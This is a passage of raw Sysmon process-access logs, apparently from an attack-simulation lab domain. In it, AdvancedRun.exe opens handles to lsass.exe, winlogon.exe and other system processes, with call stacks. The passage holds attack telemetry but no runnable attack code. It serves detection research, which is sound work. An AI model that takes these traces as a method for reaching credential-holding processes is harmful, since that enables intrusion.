al\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004008555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 